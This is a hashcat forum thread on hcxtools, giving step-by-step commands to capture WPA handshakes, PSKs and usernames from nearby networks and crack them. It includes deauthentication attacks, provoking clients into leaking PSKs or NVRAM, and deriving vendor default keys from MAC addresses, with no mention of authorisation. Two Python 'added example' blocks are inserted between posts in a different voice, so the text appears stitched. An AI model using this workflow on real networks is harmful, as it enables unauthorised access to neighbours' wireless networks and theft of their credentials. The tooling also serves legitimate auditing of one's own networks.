hcxtools - solution for capturing wlan traffic and conversion to hashcat formats
Quote: There are many, many clear passwords in the captured files

How does one find/extract these clear passwords (Example commands please!)? Do we need to enable a certain option for wlandump to capture these? What causes these to be sent in the first place; isn't wireless communication encrypted and only hashes are exchanged? thanks
Reply
What is the advantage of using (wlandump) -l switch with respect to password cracking? I don't enable it, am I missing something important?
Reply
Hi RashidMalik.
wlandump-ng -l and hcxdumptool -O enable capturing of IPv4 and IPv6 traffic (for example from hotspots).
For example all non EAP based authentications like:
- TLS authentications
- CHAP authentications
- TACACS+ authentication (https://hashcat.net/forum/thread-7062.html)

It isn't enabled by default, because these cap files can grow very big (very fast).

Passwords (PSK), usernames and identities are captured by default. You can retrieve them using hcxdumptool -E -U -I options. Unfortunately we can't decide between ESSIDs and PSKs. So you find both of them in -E option file.

The more clients you receive, the more PSKs, usernames and/or identities you will get.
APs don't send PSKs, usernames and/or identities!

wlandump-ng and wlancap2hcx are outdated. I kept them only for backward compatibility (libpcap).
hcxdumptool and hcxpcaptool are the successors.
Reply
Hello ZerBea
Really appreciate your posts. They are full of gems and I am going through all your posts gathering those gems. Thanks for all the time you (and your great team) put into writing these posts (making them understandable to newbies like me) and also into creating/updating the awesome hcx tools.

Q1 What is the difference between these two tools "wlancap2hcx" and "hcxpcaptool"? They seem to have some common functionality? Which one is suitable for which purpose?

Q2 I have switched to hcxdumptool (from wlandump-ng) as you had stated that the latter was now outdated. I have now been using hcxdumptool for about two days and it seems that the wlandump tool used to catch more handshakes. Is it possible that wlandump works better on some platforms (I am on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali) linux (4.15.0-kali3-amd64)), maybe because it communicates with the system drivers? (Commands used:
wlandump-ng -i wlan1mon -o 13052018-1031am.cap -R -U -s
hcxdumptool -i wlan1mon -o 14052018-1115am.cap -D -t 15 -s -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 )

Q3 Which linux distribution do you suggest is best for working with hashcat? My laptop has an Intel Core i5 processor and an Intel graphics card. I can't use my processor with hashcat due to CLI issues; the graphics card works (but only with the --force option), but then the whole system seems to come to a crawl, can't do anything else, especially with browsers?
Reply
Hi RashidMalik.
Nice to hear that.
Q1 What is the difference between these two tools "wlancap2hcx" and "hcxpcaptool"? They seem to have some common functionality? Which one is suitable for which purpose?
It's nearly the same as the difference between wlandump-ng and hcxdumptool:
- wlancap2hcx uses libpcap, hcxpcaptool doesn't use it.
- hcxpcaptool supports more formats than wlancap2hcx and the detection of handshakes is much, much better.
 (broken ESSIDs, no ESSIDs, broken handshakes...)
- hcxpcaptool has some additional functions
 (for example -O to convert all handshakes to hccapx - useful if an unauthorized client tries some passwords)
- hcxpcaptool is the tool for conversion of cap, pcap, pcap-ng, cap.gz to hccapx on wpa-sec
- it will replace wlancap2hcx

Q2 I have switched to hcxdumptool (from wlandump-ng) as you had stated that the latter was now outdated.
I have been now using hcxdumptool for about two days and it seems that wlandump tool used to catch more handshakes.
Definitely no. In your case:
hcxdumptool -i wlan1mon -o 14052018-1115am.cap -D -t 15 -s -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14
you disabled attacks against existing connections (-D : do not transmit deauthentications or disassociations)
So you will get only handshakes from AP-less attacks.
Also you can improve your scanlist. Just do a wlanrcascan to see what channels are used in your area (for example 1,6,11). Then create your scanlist: 1,6,11,2,1,6,11,3,1,6,11,4,1,6,11,5,1,6,11,7,1,6,11,8,1,6,11,9,1,6,11,10,1,6,11,12,1,6,11,13,1,6,11,14,1,6,11
so your commandline could look like this:
hcxdumptool -i wlan1mon -o 14052018-1115am.cap -t 15 -c 1,6,11,2,1,6,11,3,1,6,11,4,1,6,11,5,1,6,11,7,1,6,11,8,1,6,11,9,1,6,11,10,1,6,11,12,1,6,11,13,1,6,11,14,1,6,11 -s
if you captured enough/all handshakes from APs in your area you can move to:
hcxdumptool -i wlan1mon -o 14052018-1115am.cap -t 15 -c 2,4,6,8,10,12 -s
to attack only new clients on less used channels.

Is it possible that wlandump works better on some platforms (I am on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali) linux (4.15.0-kali3-amd64)), maybe because it communicates with the system drivers?
Definitely yes - a reason, why I didn't remove it, yet.

Q3 Which linux distribution do you suggest is best for working with hashcat?
That is hard to answer. The recommended distribution is UBUNTU. You get help here in the forum and you can read everything about the installation on the wiki pages.
I prefer arch LINUX. It's not easy to install and even less easy to configure. arch LINUX isn't beginner-friendly.
But ask yourself: I would like to build a cracking system.
-do I need a multimedia distribution?
-do I need an oversized environment (like KDE, Gnome, UNITY) or is LXQT, XFCE better for me?
-do I need all the services started by default (like pulseaudio, networkmanager, wpa-supplicant, and more....)
For example UBUNTU:
https://askubuntu.com/questions/702209/h...untu-15-10
and arch:
systemctl enable acpid.service
systemctl enable avahi-daemon.service
systemctl enable org.cups.cupsd.service
systemctl enable cronie.service
systemctl enable ntpd.service
(no unnecessary services, only what I decided to start)

You can read more here:
https://wiki.archlinux.org/index.php/arc...tributions
Reply
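The weighted scanlist ZerBea describes above (every other channel preceded by a pass over the busy channels 1, 6 and 11, and the list closed by one more pass over them) is easy to get wrong by hand for a long channel set, so here is an added example that generates it. This is not code from hcxtools or from the thread; build_scanlist, scanlist_arg and visit_counts are names chosen here, and the only assumption is that hcxdumptool -c takes the comma-separated list exactly as shown in the post.

```python
# Added example (not hcxtools code): build the weighted channel list for
# hcxdumptool -c from the busy channels wlanrcascan reported.

def build_scanlist(busy, channels):
    """Return the ordered channel list for hcxdumptool -c.

    busy:     channels seen as heavily used (e.g. [1, 6, 11])
    channels: every channel to cover (e.g. range(1, 15) for 1..14)

    Each non-busy channel is preceded by one pass over the busy channels,
    and the list ends with another pass over them, so the busy channels
    are revisited between every hop to a quiet one.
    """
    busy = list(busy)
    others = [c for c in channels if c not in busy]
    order = []
    for c in others:
        order.extend(busy)
        order.append(c)
    order.extend(busy)
    return order


def scanlist_arg(busy, channels):
    """Format the list as the comma-separated argument hcxdumptool -c expects."""
    return ",".join(str(c) for c in build_scanlist(busy, channels))


def visit_counts(order):
    """How often each channel is visited in one full pass of the list."""
    counts = {}
    for c in order:
        counts[c] = counts.get(c, 0) + 1
    return counts


if __name__ == "__main__":
    # Phase 1: cover everything, weighted towards the busy channels.
    arg = scanlist_arg([1, 6, 11], range(1, 15))
    print("hcxdumptool -i wlan1mon -o record.pcap -t 15 -c", arg, "-s")
    print(visit_counts(build_scanlist([1, 6, 11], range(1, 15))))
    # Phase 2 (once the busy APs are captured): only the quieter channels,
    # with no busy channels interleaved.
    print("hcxdumptool -i wlan1mon -o record.pcap -t 15 -c",
          scanlist_arg([], [2, 4, 6, 8, 10, 12]), "-s")
```

With an empty busy list the function degrades to a plain channel list, which is the second command in the post (2,4,6,8,10,12); visit_counts shows that channels 1, 6 and 11 get 12 visits per pass against one visit for each other channel.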
Oh, I noticed, that I didn't answer your first question:
How does one find/extract these clear passwords (Example commands please!)? Do we need to enable a certain option for wlandump to capture these? What causes these to be sent in the first place; isn't wireless communication encrypted and only hashes are exchanged? thanks

Finding PSKs is easy. But you have to develop a sight for that.
PSKs can be found in probe requests, identity responses and authentication frames (usernames).
A detailed tutorial is here: https://hashcat.net/forum/thread-6661-po...l#pid35891
including a test cap: https://hashcat.net/forum/attachment.php?aid=512
command to save them:
hcxpcaptool -o test.hccapx -E probes -I identities -U usernames *.cap

What causes these to be sent in the first place?
A damaged wpa-supplicant.conf of the client.
We can annoy a client in such a way, that he sends us his PSK and/or complete NVRAM.

Isn't wireless communication encrypted and only hashes are exchanged?
Yes, but those (management) frames are unencrypted.
Reply
(08-18-2017, 01:15 PM)ZerBea Wrote: weak point analyse (2)

Take a look into hashcat.pot.2500 and search for networks
using similar default passwords.

Try to figure out how the algo is calculated.
pwhash will help you on hash calculated algos

example:
If you think the algo uses the mac and the keyspace is ABCDEFGHIJKLMNOPQRSTUVWXYZ
and you have two mac_ap and 2 passwords

mac_ap: 001122334455 password: JMNADJAT
mac_ap: AABBCCDDEEFF password: WVRNVEJJ


pwhash 001122334455 ABCDEFGHIJKLMNOPQRSTUWVXYZ
...
md5-hex.......: 572e74cdf761d0e4038509919cd8af1a
md5-base64....: Vy50zfdh0OQDhQmRnNivGg==
md5-ascii.....: JUMXNTAUDDJPAITA
...

pwhash AABBCCDDEEFF ABCDEFGHIJKLMNOPQRSTUWVXYZ
...
md5-hex.......: 7d6d7ec9459bdd10988abaf6bfa5232f
md5-base64....: fW1+yUWb3RCYirr2v6UjLw==
md5-ascii.....: WFVTRZNQVIEMJJJW
...

password1: JMNADJAT
password2: WVRNVEJJ

md5-ascii.....: JUMXNTAUDDJPAITA
md5-ascii.....: WFVTRZNQVIEMJJJW

Congratulations, you found the default algo.

Where can I find this pwhash? Google search turned up a lot of variants. Which one exactly are you using? It's not installed on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali) by default and I could not locate it in the repository?
Reply
Hi RashidMalik.
This tool (and some others) is located on GitHub (https://github.com/ZerBea):
https://github.com/ZerBea/hcxkeys
Reply
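To make the quoted pwhash output checkable by hand, here is an added example (not hcxkeys' own source and not from the thread) that reproduces its md5-ascii line. The mapping it implements, each digest byte taken modulo the keyspace length and used as an index into the keyspace, is inferred from the two digests and md5-ascii strings quoted above and reproduces both exactly; that pwhash hashes the MAC as ASCII text is an assumption here, so only the byte-to-keyspace step is checked against the post. The names digest_to_keyspace, md5_ascii and psk_in_derivation are chosen for this example. The practical use is defensive: if a PSK recovered from your own potfile turns up inside the string derived from the AP's MAC, that device still carries a vendor default PSK and should be rekeyed.

```python
import hashlib

# Keyspace exactly as typed in the quoted pwhash command (note U and W swapped).
KEYSPACE = "ABCDEFGHIJKLMNOPQRSTUWVXYZ"


def digest_to_keyspace(digest, keyspace=KEYSPACE):
    """Map raw hash bytes onto keyspace characters, one character per byte.

    Inferred mapping: byte value modulo len(keyspace) selects the character.
    For a 16-byte md5 digest this yields the 16-character md5-ascii string.
    """
    n = len(keyspace)
    return "".join(keyspace[b % n] for b in digest)


def md5_ascii(text, keyspace=KEYSPACE):
    """md5 over the ASCII text (assumed input form), then the keyspace mapping."""
    return digest_to_keyspace(hashlib.md5(text.encode("ascii")).digest(), keyspace)


def psk_in_derivation(psk, derived):
    """True if a recovered PSK is a substring of the derived string.

    Default-PSK schemes commonly use only a prefix of the derived value, so a
    substring match is the check, not full equality.
    """
    return psk in derived


if __name__ == "__main__":
    # Digests quoted from the post, used to confirm the mapping.
    quoted = {
        "572e74cdf761d0e4038509919cd8af1a": "JUMXNTAUDDJPAITA",
        "7d6d7ec9459bdd10988abaf6bfa5232f": "WFVTRZNQVIEMJJJW",
    }
    for hexdigest, expected in quoted.items():
        got = digest_to_keyspace(bytes.fromhex(hexdigest))
        print(hexdigest, "->", got, "OK" if got == expected else "MISMATCH")

    # Assumed input form: the MAC as ASCII text, as typed in the command.
    for mac_ap in ("001122334455", "AABBCCDDEEFF"):
        print(mac_ap, "md5-ascii:", md5_ascii(mac_ap))

    # Constructed potfile entry (mac_ap, cracked psk) checked against the derivation.
    derived = digest_to_keyspace(bytes.fromhex("572e74cdf761d0e4038509919cd8af1a"))
    print("JUMXNTAU derived from MAC?", psk_in_derivation("JUMXNTAU", derived))
```

Other pwhash lines (md5-hex, md5-base64) are just the hex and base64 encodings of the same digest; swapping hashlib.md5 for hashlib.sha1 or sha256 covers the other hash-based variants the same way once you know which one the vendor used.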
Let's say I run hcxdumptool (aggressively) on a one hour timer; after one hour I hard close hcxdumptool. Then I start hcxdumptool for another hour of capture. I am left with two cap files, hour1.cap and hour2.cap. I did not move location so a large chunk of handshakes are from the same clients/APs. Quite a bit of overlap.

My goal is one hccapx without dupes for that day, should I:

Method 1
1. hcxpcaptool -o allday.hccapx hour1.cap hour2.cap

Method 2
1. cat hour1.cap hour2.cap > full.cap
2. hcxpcaptool -o allday.hccapx full.cap

Method 3
1. wlancap2hcx -p full.cap hour1.cap hour2.cap
2. hcxpcaptool -o allday.hccapx full.cap

I am currently using method 3, but I would like to use method 1. Does hcxpcaptool -o combine and compare all caps for the "best" handshakes?
Reply
Hi taxil.
Neither method 1 nor method 2 nor method 3.
First some words about the basic rationale behind hcxtools:
-hcxtools are analysis tools
-what we did not record is gone forever

1) get all handshakes from established connections in your neighbourhood
hcxdumptool -i interface -o record.pcap -t 5 -b blacklisthome

2) if you got all, focus on (new) clients (longterm - weeks!)
hcxdumptool -i interface -o record.pcap -t 60 -D -b blacklisthome

3) do the conversion
hcxpcaptool -o new.hccapx -E probelist -I identitylist -U usernamelist -P pmklist *.pcap
(if a wpa encrypted hotspot is in range, additionally use -O newall.hccapx to retrieve also connect attempts)

4) add all this raw data to your databases
cat new.hccapx >> database_best.hccapx
cat new.hccapx newall.hccapx >> database_all.hccapx
cat probelist >> databaseprobelist
cat identitylist >> databaseidentitylist
cat usernamelist >> databaseusernamelist
cat pmklist >> databasepmklist
cat database*list > workinglist (and sort this list uniq)
run workinglist against your database_best and use --potfile option of hashcat
create pmklist from hashcat.2500 potfile
cat pmklist >> databasepmklist
from now on, you can run pmklist in combination with --remove against your database and/or incoming ones to remove already cracked ones in a very fast way.

Now put your focus on common ESSIDs and get them:
wlanhcx2ssid -i database_xxx.hccapx -X default (you can do this on best and/or raw)
In this case you get full advantage of reuse PBKDF2 on default.hccapx for common ESSIDs

If you need a single ESSID:
wlanhcx2ssid -i database_best.hccapx -w forced.hccapx

Retrieve info about converted networks:
wlanhcxinfo -i forced.hccapx -a -s -e | sort | uniq

and get exact the network you like to attack by mac or ESSID or whatever you like:
wlanhcx2ssid -i forced.hccapx -A mac_ap

Do not try to run useless wordlists found in www (and most of them are useless for your purpose)
Analyze your potfile to get information about the keyspace of similar networks (same VENDOR and/or ISP)
Use -O option of hcxpcaptool (maybe a client made a typo - half PSK, you are able to crack)
Analyze probelist (maybe PSK or similar PSK is inside)
Build your own wordlist based on your database lists and run rules on them
cat database lists and cracked to one list and run princeattack
Annoy the client to retrieve his NVRAM and or PSK - longterm: hcxdumptool -i interface -o record.pcap -t 60 -D -b blacklisthome
(that is not the same like a "normal" rogue AP or an evil twin - we are on protocol level)

This procedure will work:
for example https://wpa-sec.stanev.org/?stats
Last 24h processed handshakes: 15760
Last 24h performance: 176.23K/s
Last 24h submissions: 288
Last 24h founds: 231
Reply